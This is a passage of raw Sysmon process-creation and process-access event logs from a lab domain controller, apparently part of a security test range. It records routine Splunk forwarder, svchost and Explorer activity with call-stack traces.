Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031153Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:10.096{7901BC46-561E-6008-0407-00000000A301}4556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031178Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:11.518{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-561F-6008-0607-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031177Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:11.518{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031176Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:11.518{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031175Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:11.518{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031174Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:11.518{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031173Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:11.518{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-561F-6008-0607-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031172Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:11.518{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-561F-6008-0607-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031171Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:11.518{7901BC46-561F-6008-0607-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031170Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:11.002{7901BC46-561E-6008-0507-00000000A301}14246672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031208Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.751{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031207Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.751{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031206Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.751{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031205Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031204Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031203Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031202Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031201Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031200Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031199Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031198Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031197Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031196Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031195Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031194Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031193Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031192Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031191Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031190Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031189Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:11:48.610{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031188Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 